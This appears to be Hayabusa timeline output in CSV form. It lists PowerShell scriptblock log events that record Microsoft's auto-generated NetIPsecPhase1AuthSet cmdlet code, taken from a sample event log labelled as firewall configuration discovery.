$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter 
-Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecPhase1AuthSet' function Remove-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] 
[OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, 
[Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) 
$__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters 
= Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecPhase1AuthSet' function Rename-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', Pos",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"itionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] 
[OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] 
${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, 
$true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } 
$__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParam",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"eter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, 
